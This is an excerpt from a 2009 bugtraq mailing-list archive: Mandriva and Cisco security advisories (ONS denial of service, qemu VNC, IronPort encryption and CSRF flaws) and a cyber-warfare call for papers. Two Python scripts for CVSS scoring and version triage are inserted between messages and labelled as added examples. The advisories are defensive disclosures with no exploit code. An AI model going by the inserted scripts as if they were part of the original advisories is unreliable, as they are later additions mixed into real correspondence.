 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFJbVRimqjQ0CJFipgRAoEPAJ0dZtxXkpX7Ft2YHREKrePd7QV9WgCg827W
ha/fMpm4QxG0vwCrbHMLjK4=iT86
-----END PGP SIGNATURE-----

From - Wed Jan 14 13:52:18 2009
Sender: nobody@cisco.com
From: Cisco Systems Product Security Incident Response Team <psirt@cisco.com>
To: bugtraq@securityfocus.com
Cc: psirt@cisco.com
Subject: Cisco Security Advisory: Cisco ONS Platform Crafted Packet Vulnerability
Date: Wed, 14 Jan 2009 17:00:00 +0100
Message-id: <200901141701.ons@psirt.cisco.com>
Reply-To: psirt@cisco.com
Errors-To: nobody@cisco.com
MIME-Version: 1.0
Content-Type: Text/Plain; charset="us-ascii"
Content-Transfer-Encoding: 8bit
Prevent-NonDelivery-Report: 
Content-Return: Prohibited
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Cisco Security Advisory: Cisco ONS Platform Crafted Packet
Vulnerability

Advisory ID: cisco-sa-20090114-ons

http://www.cisco.com/warp/public/707/cisco-sa-20090114-ons.shtml

Revision 1.0

For Public Release 2009 January 14 1600 UTC (GMT)

- ---------------------------------------------------------------------

Summary
======
The Cisco ONS 15300 series Edge Optical Transport Platform, the Cisco
ONS 15454 Optical Transport Platform, the Cisco ONS 15454 SDH
Multiservice Platform, and the Cisco ONS 15600 Multiservice Switching
Platform contain a vulnerability when processing TCP traffic streams
that may result in a reload of the device control card.

Cisco has released free software updates that address this
vulnerability.

There are no workarounds that mitigate this vulnerability. Several
mitigations exist that can limit the exposure of this vulnerability.

This advisory is posted at 
http://www.cisco.com/warp/public/707/cisco-sa-20090114-ons.shtml

Affected Products
================
Vulnerable Products
+------------------

The following Cisco ONS products are vulnerable if running affected
software versions:

  * Cisco ONS 15310-CL and 15310-MA
  * Cisco ONS 15327
  * Cisco ONS 15454 and 15454 SDH
  * Cisco ONS 15600

Consult the section "Software Versions and Fixes" within this
advisory for affected software versions. To determine your software
version, view the Help > About window on the CTC management
software.

Products Confirmed Not Vulnerable
+--------------------------------

The following Cisco ONS products are confirmed not vulnerable:

  * Cisco ONS 15800 Series
  * Cisco ONS 15500 Series Extended Service Platform
  * Cisco ONS 15302
  * Cisco ONS 15305
  * Cisco ONS 15200 Series Metro DWDM Systems
  * Cisco ONS 15190 Series IP Transport Concentrator

No other Cisco products are currently known to be affected by this
vulnerability.

Details
======
The affected Cisco 15310-CL, 15310-MA, ONS 15327, ONS 15454, ONS
15454 SDH, and ONS 15600 hardware is managed through the CTX,
CTX2500, XTC, TCC/TCC+/TCC2/TCC2P, TCCi/TCC2/TCC2P, and TSC control
cards respectively. These control cards are usually connected to a
Data Communications Network (DCN). In this context the term DCN is
used to denote the network that transports management information
between a management station and the network entity (NE). This
definition of DCN is sometimes referred to as Management
Communication Network (MCN). The DCN is usually physically or
logically separated from the optical data network and isolated from
the Internet. This limits the exposure to the exploitation of this
vulnerability from the Internet.

A crafted stream of TCP traffic to the control cards on a node will
result in a reset of the corresponding control cards on this node. A
complete 3-way handshake is required on any open TCP port to be able
to exploit this vulnerability.

The timing for the data channels traversing the switch is provided by
the control cards.

When an active and a standby Cisco ONS 15310-MA, ONS 15310-CL, ONS
15327, ONS 15454 or ONS 15454 SDH control card reloads at the same
time, the synchronous data channels traversing the switch drop
traffic until the card comes back online. Asynchronous data channels
traversing the switch are not impacted. Manageability functions
provided by the network element using the CTX, CTX2500, XTC or TCC/
TCC+/TCC2/TCC2P control cards are not available until the control
card comes back online.

On the Cisco ONS 15600 hardware, whenever both the active and standby
control cards are rebooting at the same time, there is no impact to
the data channels traversing the switch because the TSC performs a
software reset which does not impact the timing being provided by the
TSC for the data channels.

Manageability functions provided by the network element through the
TSC control cards are not available until the control card comes back
online.

This vulnerability is documented in Cisco bug ID CSCsr41128 
and has been assigned Common Vulnerabilities and Exposures (CVE) 
identifier CVE-2008-3818.

Vulnerability Scoring Details
============================
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.

CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.

Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.

Cisco has provided an FAQ to answer additional questions regarding
CVSS at

http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html

Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at

http://intellishield.cisco.com/security/alertmanager/cvss

CVSS Base Score - 7.8

  Access Vector         : Network
  Access Complexity     : Low
  Authentication        : None
  Confidentiality Impact: None
  Integrity Impact      : None
  Availability Impact   : Complete

CVSS Temporal Score - 6.4

  Exploitability        : Functional
  Remediation Level     : Official-Fix
  Report Confidence     : Confirmed

Impact
=====
Successful exploitation of this vulnerability will result in a reset
of the node's control card. Repeated attempts to exploit this
vulnerability could result in a sustained DoS condition, dropping the
synchronous data channels traversing the switch (Cisco ONS 15310-MA,
ONS 15310-CL, ONS 15327, ONS 15454, ONS 15454 SDH) and preventing
manageability functions provided by the network element control cards
(all ONS switches) until the control card comes back online.

Software Versions and Fixes
==========================
When considering software upgrades, also consult 
http://www.cisco.com/go/psirt and any subsequent advisories to 
determine exposure and a complete upgrade solution.

In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.

+-------------------------------------------------------------------------+
| Affected Major Release          | First Fixed Release                   |
|---------------------------------+---------------------------------------|
| 7.0                             | Note: Releases prior to 7.0.2 are not |
|                                 | vulnerable. First fixed in 7.0.7      |
|---------------------------------+---------------------------------------|
| 7.2                             | Note: Releases prior to 7.2.2 are not |
|                                 | vulnerable. First fixed in 7.2.3      |
|---------------------------------+---------------------------------------|
| 8.0                             | Vulnerable; migrate to 8.5.3 or       |
|                                 | later.                                |
|---------------------------------+---------------------------------------|
| 8.5                             | Note: Releases prior to 8.5.1 are not |
|                                 | vulnerable. First fixed in 8.5.3      |
|---------------------------------+---------------------------------------|
| 9.0                             | Not vulnerable.                       |
+-------------------------------------------------------------------------+

Note: Releases prior to 7.0 are not affected by this vulnerability.

Workarounds
==========
There are no workarounds for this vulnerability. The following
general mitigation actions help prevent remote exploitation:

  * Isolate DCN:
    Ensuring the DCN is physically or logically separated from the
    customer network and isolated from the Internet will limit the
    exposure to the exploitation of these vulnerabilities from the
    Internet or customer networks.
  * Apply Transit Access Control Lists:
    Apply access control lists (ACLs) on routers / switches /
    firewalls installed in front of the vulnerable network devices
    such that TCP/IP traffic destined for the CTX, CTX2500, XTC, TCC2
    /TCC2+/TCC2P, or TSC control cards on the ONS is allowed only
    from the network management workstations.
    For examples on how to apply ACLs on Cisco routers, refer to the
    white paper "Transit Access Control Lists: Filtering at Your
    Edge", which is available at the following link: 
    http://www.cisco.com/en/US/customer/tech/tk648/tk361/technologies_white_paper09186a00801afc76.shtml

Additional mitigations that can be deployed on Cisco devices within
the network are available in the Cisco Applied Mitigation Bulletin
companion document for this advisory, which is available at the
following link: 
http://www.cisco.com/warp/public/707/cisco-amb-20090114-ons.shtml

Obtaining Fixed Software
=======================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.

Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at 
http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html
or as otherwise set forth at Cisco.com Downloads at 
http://www.cisco.com/public/sw-center/sw-usingswc.shtml

Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.

Customers with Service Contracts
+-------------------------------

Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com

Customers using Third Party Support Organizations
+------------------------------------------------

Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.

The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.

Customers without Service Contracts
+----------------------------------

Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.

  * +1 800 553 2447 (toll free from within North America)
  * +1 408 526 7209 (toll call from anywhere in the world)
  * e-mail: tac@cisco.com

Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.

Refer to http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
for additional TAC contact information, including localized 
telephone numbers, and instructions and e-mail addresses for use in
various languages.

Exploitation and Public Announcements
====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerability described in this advisory.

This vulnerability was found by reviewing Cisco TAC service requests.

Status of this Notice: FINAL
===========================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.

A stand-alone copy or paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.

Distribution
===========
This advisory is posted on Cisco's worldwide website at:

http://www.cisco.com/warp/public/707/cisco-sa-20090114-ons.shtml

In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.

  * cust-security-announce@cisco.com
  * first-bulletins@lists.first.org
  * bugtraq@securityfocus.com
  * vulnwatch@vulnwatch.org
  * cisco@spot.colorado.edu
  * cisco-nsp@puck.nether.net
  * full-disclosure@lists.grok.org.uk
  * comp.dcom.sys.cisco@newsgate.cisco.com

Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.

Revision History
===============
+---------------------------------------+
| Revision |                 | Initial  |
| 1.0      | 2009-January-14 | public   |
|          |                 | release  |
+---------------------------------------+

Cisco Security Procedures
========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at 
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco 
security notices. All Cisco security advisories are available at 
http://www.cisco.com/go/psirt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (Darwin)

iEYEARECAAYFAkluC5MACgkQ86n/Gc8U/uCIiwCfb0TgaYDql8VEjtERKMaqgHOm
h0oAniEObgEKjHbo+CHnJxfFFKhCr17o
=7xLg
-----END PGP SIGNATURE-----
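
The CVSS figures in the Cisco ONS advisory above (base 7.8, temporal 6.4) can be reproduced from its listed metrics, and the environmental score it leaves to customers can be computed the same way. The following is an added example, not part of the advisory or Cisco's calculator; it uses the published CVSS version 2.0 equations and weights, and the environmental inputs in the demo (a high availability requirement, high target distribution) are assumptions chosen for illustration.

```python
import math

# CVSS v2.0 metric weights (from the CVSS v2 specification).
AV = {"L": 0.395, "A": 0.646, "N": 1.0}          # Access Vector
AC = {"H": 0.35, "M": 0.61, "L": 0.71}           # Access Complexity
AU = {"M": 0.45, "S": 0.56, "N": 0.704}          # Authentication
CIA = {"N": 0.0, "P": 0.275, "C": 0.660}         # C/I/A impact
E = {"U": 0.85, "POC": 0.90, "F": 0.95, "H": 1.0, "ND": 1.0}
RL = {"OF": 0.87, "TF": 0.90, "W": 0.95, "U": 1.0, "ND": 1.0}
RC = {"UC": 0.90, "UR": 0.95, "C": 1.0, "ND": 1.0}
CDP = {"N": 0.0, "L": 0.1, "LM": 0.3, "MH": 0.4, "H": 0.5, "ND": 0.0}
TD = {"N": 0.0, "L": 0.25, "M": 0.75, "H": 1.0, "ND": 1.0}
REQ = {"L": 0.5, "M": 1.0, "H": 1.51, "ND": 1.0}  # CR / IR / AR


def round1(x):
    """Round half up to one decimal, as CVSS v2 specifies."""
    return math.floor(x * 10 + 0.5) / 10


def _score(impact, exploitability):
    f_impact = 0.0 if impact == 0 else 1.176
    return round1((0.6 * impact + 0.4 * exploitability - 1.5) * f_impact)


def _exploitability(av, ac, au):
    return 20 * AV[av] * AC[ac] * AU[au]


def base_score(av, ac, au, c, i, a):
    impact = 10.41 * (1 - (1 - CIA[c]) * (1 - CIA[i]) * (1 - CIA[a]))
    return _score(impact, _exploitability(av, ac, au))


def temporal_score(base, e, rl, rc):
    return round1(base * E[e] * RL[rl] * RC[rc])


def environmental_score(av, ac, au, c, i, a, e, rl, rc,
                        cdp="ND", td="ND", cr="ND", ir="ND", ar="ND"):
    # The impact sub-score is re-weighted by the site's security
    # requirements and capped at 10 before the base equation is re-run.
    adj_impact = min(10.0, 10.41 * (1 - (1 - CIA[c] * REQ[cr])
                                      * (1 - CIA[i] * REQ[ir])
                                      * (1 - CIA[a] * REQ[ar])))
    adj_base = _score(adj_impact, _exploitability(av, ac, au))
    adj_temporal = temporal_score(adj_base, e, rl, rc)
    return round1((adj_temporal + (10 - adj_temporal) * CDP[cdp]) * TD[td])


# Metrics exactly as listed in the advisory:
# AV Network, AC Low, Au None, C None, I None, A Complete;
# Exploitability Functional, Remediation Official-Fix, Confidence Confirmed.
ONS_BASE = ("N", "L", "N", "N", "N", "C")
ONS_TEMPORAL = ("F", "OF", "C")

if __name__ == "__main__":
    base = base_score(*ONS_BASE)
    print("base         ", base)
    print("temporal     ", temporal_score(base, *ONS_TEMPORAL))
    # Assumed site profile: availability of the control cards is critical
    # (AR=H) and every node in the environment runs an affected release (TD=H).
    print("environmental", environmental_score(*ONS_BASE, *ONS_TEMPORAL,
                                               ar="H", td="H"))
```

With every environmental metric left at "Not Defined" the environmental score equals the temporal score, so any difference comes entirely from the site-specific inputs.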
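
For inventory triage against the "Software Versions and Fixes" table in the Cisco ONS advisory above, the release ranges can be encoded once and applied to every node. This is an added example, not Cisco tooling; it assumes release strings of the form major.minor.maintenance as read from the CTC Help > About window, and the node names in the sample inventory are constructed.

```python
import re

# Encoded from the advisory table: train -> (first vulnerable, first fixed).
RANGED_TRAINS = {
    (7, 0): ((7, 0, 2), (7, 0, 7)),
    (7, 2): ((7, 2, 2), (7, 2, 3)),
    (8, 5): ((8, 5, 1), (8, 5, 3)),
}


def parse_release(text):
    """Return (major, minor, maintenance-or-None) from a release string."""
    m = re.match(r"^\s*[Vv]?(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not m:
        raise ValueError("unrecognised release string: %r" % text)
    major, minor, maint = m.groups()
    return int(major), int(minor), (int(maint) if maint is not None else None)


def classify(text):
    """Map a release string to (status, note) according to the advisory."""
    major, minor, maint = parse_release(text)
    train = (major, minor)
    if train < (7, 0):
        return "not-vulnerable", "releases prior to 7.0 are not affected"
    if train == (9, 0):
        return "not-vulnerable", "9.0 is listed as not vulnerable"
    if train == (8, 0):
        return "vulnerable", "no fix in 8.0; migrate to 8.5.3 or later"
    if train not in RANGED_TRAINS:
        # The advisory says nothing about this train; do not guess.
        return "unlisted", "train %d.%d is not in the advisory table" % train
    if maint is None:
        # A truncated version such as "7.0" cannot be placed in the range.
        return "indeterminate", "maintenance number needed for %d.%d" % train
    first_bad, first_fixed = RANGED_TRAINS[train]
    release = (major, minor, maint)
    if release < first_bad:
        return "not-vulnerable", "predates first vulnerable release %d.%d.%d" % first_bad
    if release >= first_fixed:
        return "not-vulnerable", "at or after first fixed release %d.%d.%d" % first_fixed
    return "vulnerable", "upgrade to %d.%d.%d or later" % first_fixed


def triage(inventory):
    """Return {node: (status, note)} for a {node: release} inventory."""
    return {node: classify(release) for node, release in inventory.items()}


# Constructed sample inventory (node names are hypothetical).
SAMPLE_INVENTORY = {
    "ons15454-core-a": "7.0.5",
    "ons15454-core-b": "7.0.7",
    "ons15310-edge-1": "8.0.1",
    "ons15600-hub": "8.5.0",
    "ons15327-lab": "7.2",
}

if __name__ == "__main__":
    for node, (status, note) in sorted(triage(SAMPLE_INVENTORY).items()):
        print("%-18s %-15s %s" % (node, status, note))
```

Nodes reported as "indeterminate" or "unlisted" need a manual check rather than being treated as safe.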

From - Wed Jan 14 14:02:17 2009
To: bugtraq@securityfocus.com
Subject: [ MDVSA-2009:010 ] qemu
Date: Wed, 14 Jan 2009 00:13:01 -0700
From: security@mandriva.com
Reply-To: <xsecurity@mandriva.com>
Message-Id: <E1LMzvx-0005By-0Z@titan.mandriva.com>
Status:   


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2009:010
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : qemu
 Date    : January 14, 2009
 Affected: 2008.0, 2008.1
 _______________________________________________________________________

 Problem Description:

 A security vulnerability has been discovered and corrected
 in VNC server of qemu 0.9.1 and earlier, which could lead to a
 denial-of-service attack (CVE-2008-2382).
 
 The updated packages have been patched to prevent this.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2382
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2008.0:
 d18f37c8afe834fc75b8d20fd739c35e  2008.0/i586/dkms-kqemu-1.3.0-0.pre11.13.3mdv2008.0.i586.rpm
 90ac7511cb7b1ef350b0edeaddcbb61c  2008.0/i586/qemu-0.9.0-16.3mdv2008.0.i586.rpm
 14fb383247d38fa1625384e8a5c07106  2008.0/i586/qemu-img-0.9.0-16.3mdv2008.0.i586.rpm 
 7a7c649d2c0e033767a8f891491fa11a  2008.0/SRPMS/qemu-0.9.0-16.3mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 a199c71663339ff512fc286287aa393f  2008.0/x86_64/dkms-kqemu-1.3.0-0.pre11.13.3mdv2008.0.x86_64.rpm
 d6ad774c00ab0f8d7583d6903d845bda  2008.0/x86_64/qemu-0.9.0-16.3mdv2008.0.x86_64.rpm
 d7dfcf881def049285be2f22cb430d8b  2008.0/x86_64/qemu-img-0.9.0-16.3mdv2008.0.x86_64.rpm 
 7a7c649d2c0e033767a8f891491fa11a  2008.0/SRPMS/qemu-0.9.0-16.3mdv2008.0.src.rpm

 Mandriva Linux 2008.1:
 0b47bf7f27ba348045e167c2e3c69119  2008.1/i586/dkms-kqemu-1.3.0-0.pre11.15.3mdv2008.1.i586.rpm
 66202d0f349f70cf8ac1289bb5e70708  2008.1/i586/qemu-0.9.0-18.3mdv2008.1.i586.rpm
 b2ed2e31823f48695a97f8bbc506e7f6  2008.1/i586/qemu-img-0.9.0-18.3mdv2008.1.i586.rpm 
 5f7d176cfba6e6b262c14de369eb60e1  2008.1/SRPMS/qemu-0.9.0-18.3mdv2008.1.src.rpm

 Mandriva Linux 2008.1/X86_64:
 2111acd253c95c5633f5389dedf7af1d  2008.1/x86_64/dkms-kqemu-1.3.0-0.pre11.15.3mdv2008.1.x86_64.rpm
 dd1b9f85874c290458fa4b7943c233ee  2008.1/x86_64/qemu-0.9.0-18.3mdv2008.1.x86_64.rpm
 e22ca1a87a2a41f8f306da778b15e5f0  2008.1/x86_64/qemu-img-0.9.0-18.3mdv2008.1.x86_64.rpm 
 5f7d176cfba6e6b262c14de369eb60e1  2008.1/SRPMS/qemu-0.9.0-18.3mdv2008.1.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFJbWPlmqjQ0CJFipgRAnvHAJoD0Inft9/2qDupdRM8u0nBQs81bgCgo28B
qXNv6NOXGtRSPKGNS0Acc3o=DHda
-----END PGP SIGNATURE-----

From - Wed Jan 14 14:12:17 2009
Date: 14 Jan 2009 08:08:57 -0000
Message-ID: <20090114080857.2258.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: kgconference@gmail.com
To: bugtraq@securityfocus.com
Subject: Call for Papers: Cyber Warfare
Status:   

-----

Call for Papers!

Conference on Cyber Warfare

June 17-19, 2009

Tallinn, Estonia

The Cooperative Cyber Defence Centre of Excellence is hosting a Conference on Cyber Warfare in 2009.  

CCD CoE is soliciting research papers within the emerging field of cyber warfare, including but not limited to the following topics:

#  Concepts and Doctrine
#  Technical Challenges and Solutions
#  Strategic Analysis
#  Cooperative Cyber Defence
#  Lessons Learned
#  Proofs of Concept
#  The Future

The Selection Committee seeks submissions from academia and the professional world that offer an original and substantial contribution toward understanding conflict in cyberspace.

Authors should send a one-page abstract to cfp@ccdcoe.org between January 1 and March 15, 2009.

The Selection Committee will notify all authors of its decisions ASAP following submission but NLT April 1.

Final papers are due May 15, 2009.  They will be presented at the conference by the author and published in the conference proceedings.

Keynote Speakers include:
James Lewis (CSIS) "Securing Cyberspace for the 44th Presidency"
Mikko Hypponen (F-Secure) Chief Research Officer

Conference registration information will be posted by February 1 at www.ccdcoe.org.

Questions regarding this conference may be sent to cwcon@ccdcoe.org from January 1, 2009. 

Conference Manager:

Kenneth Geers, CCD CoE Scientist

-----

From - Wed Jan 14 14:12:18 2009
Sender: nobody@cisco.com
From: Cisco Systems Product Security Incident Response Team <psirt@cisco.com>
To: bugtraq@securityfocus.com
Cc: psirt@cisco.com
Subject: Cisco Security Advisory: IronPort Encryption Appliance / PostX and PXE Encryption Vulnerabilities
Date: Wednesday, 14 January 2009 11:15:00 -0600 

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Cisco Security Advisory: IronPort Encryption Appliance / PostX and
                         PXE Encryption Vulnerabilities

Advisory ID: cisco-sa-20090114-ironport

Revision 1.0

For Public Release 2009 January 14 1600 UTC (GMT)

+---------------------------------------------------------------------

Summary
======
IronPort PXE Encryption is an e-mail encryption solution that is
designed to secure e-mail communications without the need for a
Public Key Infrastructure (PKI) or special agents on receiving
systems. When an e-mail message is targeted for encryption, the PXE
encryption engine on an IronPort e-mail gateway encrypts the original
e-mail message as an HTML file and attaches it to a notification
e-mail message that is sent to the recipient. The per-message key
used to decrypt the HTML file attachment is stored on a local
IronPort Encryption Appliance, PostX software installation or the
Cisco Registered Envelope Service, which is a Cisco-managed software
service.

PXE Encryption Privacy Vulnerabilities
+-------------------------------------

The IronPort PXE Encryption solution is affected by two
vulnerabilities that could allow unauthorized individuals to view the
contents of secure e-mail messages. To exploit the vulnerabilities,
attackers must first intercept secure e-mail messages on the network
or via a compromised e-mail account.

IronPort Encryption Appliance Administration Interface Vulnerabilities
+---------------------------------------------------------------------

IronPort Encryption Appliance devices contain two vulnerabilities
that could allow unauthorized users to gain access to the IronPort
Encryption Appliance administration interface and modify other users'
settings. These vulnerabilities do not affect Cisco Registered
Envelope Service users.

Cisco has released free software updates that address these
vulnerabilities. There are no workarounds for the vulnerabilities
that are described in this advisory.

This advisory is posted at:

http://www.cisco.com/warp/public/707/cisco-sa-20090114-ironport.shtml

Affected Products
================
Vulnerable Products
+------------------

The following IronPort Encryption Appliance/PostX versions are
affected by these vulnerabilities:

  * All PostX 6.2.1 versions prior to 6.2.1.1
  * All PostX 6.2.2 versions prior to 6.2.2.3
  * All IronPort Encryption Appliance/PostX 6.2.4 versions prior to 6.2.4.1.1
  * All IronPort Encryption Appliance/PostX 6.2.5 versions
  * All IronPort Encryption Appliance/PostX 6.2.6 versions
  * All IronPort Encryption Appliance/PostX 6.2.7 versions prior to 6.2.7.7
  * All IronPort Encryption Appliance 6.3 versions prior to 6.3.0.4
  * All IronPort Encryption Appliance 6.5 versions prior to 6.5.0.2

The version of software that is running on an IronPort Encryption
Appliance is located on the About page of the IronPort Encryption
Appliance administration interface.

Note: Customers should contact IronPort support to determine which
software fixes are applicable for their environment. Please consult
the Obtaining Fixed Software section of this advisory for more
information.

Products Confirmed Not Vulnerable
+--------------------------------

IronPort C, M and S-Series appliances are not affected by these
vulnerabilities. Although C-Series appliances can be configured to
use a local IronPort Encryption Appliance for per-message key
retention, the C-Series appliances are not vulnerable. The Cisco
Registered Envelope Service is not vulnerable.

No other Cisco products are currently known to be affected by these
vulnerabilities.

Details
======
Note: IronPort tracks bugs using an internal system that is not
available to customers. The IronPort bug tracking identifiers are
provided for reference only.

PXE Encryption Privacy Vulnerabilities
+-------------------------------------

Individual PXE Encryption users are vulnerable to two message privacy
vulnerabilities that could allow an attacker to gain access to
sensitive information. All the vulnerabilities require an attacker to
first intercept a secure e-mail message as a condition for successful
exploitation. Attackers can obtain secure e-mail messages by
monitoring a network or a compromised user e-mail account.

The IronPort Encryption Appliance contains a logic error that could
allow an attacker to obtain the unique, per-message decryption key
that is used to protect the content of an intercepted secure e-mail
message without user interaction. Using the decryption key, an
attacker could decrypt the contents of the secure e-mail message.
This vulnerability is documented in IronPort bug 8062 and has been
assigned Common Vulnerabilities and Exposures (CVE) identifier
CVE-2009-0053.

By modifying the contents of intercepted secure e-mail messages or by
forging a close copy of the e-mail message, it may be possible for an
attacker to convince a user to view a modified secure e-mail message
and then cause the exposure of the user's credentials and message
content. Please see the Workarounds section for more information on
mitigations available to reduce exposure to these phishing-style
attacks. This vulnerability is documented in IronPort bug 8149 and
has been assigned Common Vulnerabilities and Exposures (CVE)
identifier CVE-2009-0054.

IronPort Encryption Appliance Administration Interface Vulnerabilities
+---------------------------------------------------------------------

The administration interface of IronPort Encryption Appliance devices
contains a cross-site request forgery (CSRF) vulnerability that could
allow an attacker to modify a user's IronPort Encryption Appliance
preferences, including their user name and personal security pass
phrase, if the user is logged into the IronPort Encryption Appliance
administration interface. Exploitation of the vulnerability will not
allow an attacker to change a user's password. This vulnerability is
documented in IronPort bug 5806 and has been assigned Common
Vulnerabilities and Exposures (CVE) identifier CVE-2009-0055.

The administration interface of IronPort Encryption Appliance devices
also contains a cross-site request forgery (CSRF) vulnerability that
could allow an attacker to execute a command and modify a user's
IronPort Encryption Appliance preferences, including their user name
and personal security pass phrase, under certain circumstances when a
user logs out of the IronPort Encryption Appliance administration
interface. Exploitation of the vulnerability will not allow an
attacker to change a user's password. This vulnerability is
documented in IronPort bug 6403 and has been assigned Common
Vulnerabilities and Exposures (CVE) identifier CVE-2009-0056.

Vulnerability Scoring Details
============================
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.

CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.

Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.

Cisco has provided an FAQ to answer additional questions regarding
CVSS at:

http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html

Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at:

http://intellishield.cisco.com/security/alertmanager/cvss

PXE Encryption Message Decryption Vulnerability - IronPort Bug 8062

CVSS Base Score - 7.1
    Access Vector - Network
    Access Complexity - Medium
    Authentication - None
    Confidentiality Impact - Complete
    Integrity Impact - None
    Availability Impact - None

CVSS Temporal Score - 5.9
    Exploitability - Functional
    Remediation Level - Official Fix
    Report Confidence - Confirmed

PXE Encryption Phishing Vulnerabilities - IronPort Bug 8149

CVSS Base Score - 6.1
    Access Vector - Network
    Access Complexity - High
    Authentication - None
    Confidentiality Impact - Complete
    Integrity Impact - Partial
    Availability Impact - None

CVSS Temporal Score - 5
    Exploitability - Functional
    Remediation Level - Official Fix
    Report Confidence - Confirmed

IronPort Encryption Appliance CSRF Vulnerability - IronPort Bug 5806

CVSS Base Score - 5.8
    Access Vector - Network
    Access Complexity - Medium
    Authentication - None
    Confidentiality Impact - Partial
    Integrity Impact - Partial
    Availability Impact - None

CVSS Temporal Score - 4.8
    Exploitability - Functional
    Remediation Level - Official Fix
    Report Confidence - Confirmed

IronPort Encryption Appliance Logout Action CSRF Vulnerability - IronPort Bug 6403

CVSS Base Score - 5.8
